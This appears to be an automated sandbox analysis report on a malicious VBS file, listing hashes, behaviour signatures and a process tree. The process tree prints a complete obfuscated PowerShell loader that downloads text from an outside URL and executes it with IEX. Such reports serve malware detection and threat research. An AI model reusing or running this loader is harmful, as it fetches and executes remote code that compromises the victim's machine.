Overview

overview

10

Static

static

ASNQSKJPXJ...YZ.vbs

windows7_x64

10

ASNQSKJPXJ...YZ.vbs

windows10-2004_x64

10

Analysis

  • max time kernel
    43s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    28-04-2022 06:43

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ASNQSKJPXJLKFXSIEUQYZ.vbs

  • Size

    2KB

  • MD5

    f04ca5c16f111ab69293045badd53ad9

  • SHA1

    1184fafe345b6f79d6a28d87ef957d7f96b76f52

  • SHA256

    00b3ede6f9c3073b02afc09611974bdc4765400ac8c039d620679083b88f63fe

  • SHA512

    f07b185f0b78ff3962767a7f2d85957ca9057ee049fdf90d041bd405dcc23fe2a79c71143fde8b907153942be9525941af7ffc2d9e25f6bf1717cb43990f200b

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in System32 directory 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ASNQSKJPXJLKFXSIEUQYZ.vbs"
    1⤵
      PID:660
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell $OZKQAUNQZBLNAOSVUSYESJ = '[S55]!+$]+%*+![<%[[(1[52EM.I=*4$50233)@{\960!01}$^MREAdER]'.Replace('55]!+$]+%*+![<%[[(1[52','ySt').Replace('=*4$50233)@{\960!01}$^','O.StREA');$BXJWCEVOETSZXVTQVVBBQI = ($OZKQAUNQZBLNAOSVUSYESJ -Join '')| .('{1}{0}'-f'EX','I');$BFZNFKRZGXUCXFHDPCRKXY = '[SyS%6%+4/%=5{=\{8![%6+#6*T.W76\/(1*\*=(4@_@@/2<$]8ST]'.Replace('%6%+4/%=5{=\{8![%6+#6*','TEm.NE').Replace('76\/(1*\*=(4@_@@/2<$]8','EbREquE');$UBJZAYXIRZKFCCUCKLTOFV = ($BFZNFKRZGXUCXFHDPCRKXY -Join '')| .('{1}{0}'-f'EX','I');$HNWHJYJEZGKAPCJXAVBIDJ = 'Cr_})4!/]!57\*_9\{8<-<97TE'.Replace('_})4!/]!57\*_9\{8<-<97','Ea');$PYADPHPAUKFOLHATAFZQNV = 'GE\(#7%+58^$6<4!)!*0<2&&onSE'.Replace('\(#7%+58^$6<4!)!*0<2&&','tRESp');$RRJLPFSIPIYQFCZCXNSWIQ = 'GE1@)[6_08}$/}5&2+--(2%8REam'.Replace('1@)[6_08}$/}5&2+--(2%8','tRESponSESt');$EQLBEGTOHFJKWFRNRAQNWI = 'RE2{$[&]8)4\!4]]@0#]+9)_nD'.Replace('2{$[&]8)4\!4]]@0#]+9)_','aDToE'); .('{1}{0}'-f'EX','I')($BXJWCEVOETSZXVTQVVBBQI::new($UBJZAYXIRZKFCCUCKLTOFV::$HNWHJYJEZGKAPCJXAVBIDJ('https://www.wnsolutions.potius.com.br/ServerTyw.txt').$PYADPHPAUKFOLHATAFZQNV().$RRJLPFSIPIYQFCZCXNSWIQ()).$EQLBEGTOHFJKWFRNRAQNWI())
      1⤵
      • Process spawned unexpected child process
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1624

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1624-54-0x000007FEFC021000-0x000007FEFC023000-memory.dmp
      Filesize

      8KB

      Download
    • memory/1624-55-0x000007FEF3B00000-0x000007FEF465D000-memory.dmp
      Filesize

      11.4MB

      Download
    • memory/1624-56-0x0000000002684000-0x0000000002687000-memory.dmp
      Filesize

      12KB

      Download
    • memory/1624-57-0x000000001B750000-0x000000001BA4F000-memory.dmp
      Filesize

      3.0MB

      Download
    • memory/1624-58-0x000000000268B000-0x00000000026AA000-memory.dmp
      Filesize

      124KB

      Download